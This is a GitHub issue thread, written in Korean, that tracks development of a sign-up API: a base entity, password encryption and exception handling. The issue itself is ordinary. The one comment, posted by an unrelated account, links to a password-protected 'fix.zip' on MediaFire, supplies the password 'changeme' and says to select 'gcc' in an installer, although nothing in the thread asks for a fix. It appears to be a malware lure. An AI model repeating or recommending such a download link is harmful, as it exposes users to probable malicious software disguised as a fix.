### ISSUE TITLE
회원가입 API 개발

### ISSUE THREAD

**Issue by bboggo** [DevFDev/backend-api#10]
## 제목
회원가입 API 개발

## 작업 내용
기본 회원가입 API 개발, 폴더 구조
(우선 이미지 등록 부분은 문자열 url로 대체하고 진행함)

### 구현 내용
- [x] BaseEntity 생성
- [x] 기본 회원가입 API
- [x] 비밀번호 암호화
- [x] 회원가입 예외처리

### 기간
~8/28(수)

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
